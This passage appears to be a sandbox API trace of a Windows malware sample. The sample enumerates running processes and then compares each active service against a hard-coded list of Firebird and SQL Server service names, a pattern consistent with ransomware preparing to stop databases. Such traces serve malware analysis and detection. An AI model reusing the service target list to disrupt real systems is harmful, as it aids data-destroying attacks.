[0186.700] lstrlenW (lpString="SearchUI.exe") returned 12 [0186.700] Process32NextW (in: hSnapshot=0x350, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0186.700] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0186.700] Process32NextW (in: hSnapshot=0x350, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0186.701] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0186.701] Process32NextW (in: hSnapshot=0x350, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0186.702] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0186.702] Process32NextW (in: hSnapshot=0x350, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0186.703] lstrlenW (lpString="hgaibc.exe") returned 10 [0186.703] Process32NextW (in: hSnapshot=0x350, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x2a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0186.704] lstrlenW (lpString="cmd.exe") returned 7 [0186.704] Process32NextW (in: hSnapshot=0x350, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xc40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0186.704] lstrlenW (lpString="conhost.exe") returned 11 [0186.705] Process32NextW (in: hSnapshot=0x350, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbb0, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0186.705] lstrlenW (lpString="conhost.exe") returned 11 [0186.705] Process32NextW (in: hSnapshot=0x350, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbb0, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0186.706] CloseHandle (hObject=0x350) returned 1 [0186.706] Sleep (dwMilliseconds=0x1f4) [0187.270] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x6bef48 [0187.270] EnumServicesStatusExW (in: hSCManager=0x6bef48, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 0 [0187.271] GetLastError () returned 0xea [0187.271] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1c30) returned 0x6d87a0 [0187.271] EnumServicesStatusExW (in: hSCManager=0x6bef48, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6d87a0, cbBufSize=0x1c30, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6d87a0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 1 [0187.272] CloseServiceHandle (hSCObject=0x6bef48) returned 1 [0187.272] lstrlenW (lpString="Appinfo") returned 7 [0187.272] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0187.272] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0187.272] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0187.272] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0187.272] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0187.272] lstrlenW (lpString="AppXSvc") returned 7 [0187.272] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0187.272] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0187.272] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0187.272] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0187.272] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0187.273] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0187.273] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0187.273] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0187.273] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0187.273] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0187.273] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0187.273] lstrlenW (lpString="Audiosrv") returned 8 [0187.273] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0187.273] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0187.273] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0187.273] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0187.273] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0187.273] lstrlenW (lpString="BFE") returned 3 [0187.273] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0187.273] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0187.273] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0187.273] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0187.273] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0187.273] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0187.273] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0187.273] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0187.273] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0187.273] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0187.273] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0187.273] lstrlenW (lpString="CDPSvc") returned 6 [0187.273] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0187.273] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0187.273] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0187.273] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0187.273] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0187.274] lstrlenW (lpString="ClickToRunSvc") returned 13 [0187.274] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0187.274] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0187.274] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0187.274] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0187.274] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0187.274] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0187.274] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0187.274] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0187.274] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0187.274] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0187.274] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0187.274] lstrlenW (lpString="CryptSvc") returned 8 [0187.274] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0187.274] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0187.274] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0187.274] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0187.274] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0187.274] lstrlenW (lpString="DcomLaunch") returned 10 [0187.274] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0187.274] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0187.274] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0187.274] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0187.274] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0187.274] lstrlenW (lpString="DeviceAssociationService") returned 24 [0187.274] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0187.274] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0187.274] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0187.274] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0187.274] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0187.274] lstrlenW (lpString="Dhcp") returned 4 [0187.274] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0187.275] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0187.275] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0187.275] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0187.275] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0187.275] lstrlenW (lpString="Dnscache") returned 8 [0187.275] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0187.275] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0187.275] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0187.275] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0187.275] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0187.275] lstrlenW (lpString="DPS") returned 3 [0187.275] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0187.275] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0187.275] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0187.275] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0187.275] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0187.275] lstrlenW (lpString="DusmSvc") returned 7 [0187.275] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0187.275] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0187.275] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0187.275] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0187.275] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0187.275] lstrlenW (lpString="EventLog") returned 8 [0187.275] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0187.275] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0187.275] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0187.275] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0187.276] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0187.276] lstrlenW (lpString="EventSystem") returned 11 [0187.276] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0187.276] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0187.276] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0187.276] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0187.276] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0187.276] lstrlenW (lpString="FontCache") returned 9 [0187.276] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0187.276] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0187.276] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0187.276] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0187.276] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0187.276] lstrlenW (lpString="gpsvc") returned 5 [0187.276] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0187.276] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0187.276] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0187.276] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0187.276] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0187.276] lstrlenW (lpString="iphlpsvc") returned 8 [0187.276] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0187.276] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0187.276] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0187.276] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0187.276] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0187.276] lstrlenW (lpString="KeyIso") returned 6 [0187.276] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0187.277] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0187.277] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0187.277] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0187.277] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0187.277] lstrlenW (lpString="LanmanServer") returned 12 [0187.277] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0187.277] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0187.277] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0187.277] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0187.277] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0187.277] lstrlenW (lpString="LanmanWorkstation") returned 17 [0187.277] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0187.277] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0187.277] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0187.277] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0187.277] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0187.277] lstrlenW (lpString="lfsvc") returned 5 [0187.277] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0187.277] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0187.277] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0187.277] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0187.277] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0187.277] lstrlenW (lpString="lmhosts") returned 7 [0187.277] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0187.277] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0187.277] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0187.277] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0187.278] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0187.278] lstrlenW (lpString="LSM") returned 3 [0187.278] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0187.278] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0187.278] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0187.278] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0187.278] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0187.278] lstrlenW (lpString="MpsSvc") returned 6 [0187.278] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0187.278] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0187.278] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0187.278] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0187.278] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0187.278] lstrlenW (lpString="NcbService") returned 10 [0187.278] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0187.278] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0187.278] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0187.278] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0187.278] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0187.278] lstrlenW (lpString="netprofm") returned 8 [0187.278] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0187.278] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0187.278] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0187.278] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0187.278] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0187.278] lstrlenW (lpString="NgcSvc") returned 6 [0187.278] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0187.279] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0187.279] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0187.279] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0187.279] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0187.279] lstrlenW (lpString="NlaSvc") returned 6 [0187.279] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0187.279] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0187.279] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0187.279] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0187.279] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0187.279] lstrlenW (lpString="nsi") returned 3 [0187.279] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0187.279] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0187.279] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0187.279] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0187.279] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0187.279] lstrlenW (lpString="PcaSvc") returned 6 [0187.279] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0187.279] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0187.279] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0187.279] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0187.279] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0187.279] lstrlenW (lpString="PlugPlay") returned 8 [0187.279] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0187.279] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0187.279] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0187.279] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0187.280] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0187.280] lstrlenW (lpString="Power") returned 5 [0187.280] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0187.280] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0187.280] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0187.280] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0187.280] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0187.280] lstrlenW (lpString="ProfSvc") returned 7 [0187.280] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0187.280] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0187.280] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0187.280] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0187.280] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0187.280] lstrlenW (lpString="RpcEptMapper") returned 12 [0187.280] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0187.280] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0187.280] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0187.318] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0187.318] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0187.318] lstrlenW (lpString="RpcSs") returned 5 [0187.319] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0187.319] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0187.319] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0187.319] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0187.319] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0187.319] lstrlenW (lpString="SamSs") returned 5 [0187.319] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0187.319] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0187.319] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0187.319] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0187.319] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0187.319] lstrlenW (lpString="Schedule") returned 8 [0187.319] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0187.319] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0187.319] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0187.319] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0187.319] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0187.319] lstrlenW (lpString="SecurityHealthService") returned 21 [0187.319] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0187.319] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0187.319] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0187.319] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0187.319] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0187.319] lstrlenW (lpString="SENS") returned 4 [0187.319] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0187.319] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0187.319] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0187.319] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0187.319] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0187.319] lstrlenW (lpString="ShellHWDetection") returned 16 [0187.319] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0187.319] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0187.319] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0187.320] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0187.320] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0187.320] lstrlenW (lpString="Spooler") returned 7 [0187.320] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0187.320] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0187.320] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0187.320] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0187.320] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0187.320] lstrlenW (lpString="StateRepository") returned 15 [0187.320] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0187.320] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0187.320] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0187.320] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0187.320] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0187.320] lstrlenW (lpString="SysMain") returned 7 [0187.320] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0187.320] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0187.320] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0187.320] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0187.321] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0187.321] lstrlenW (lpString="SystemEventsBroker") 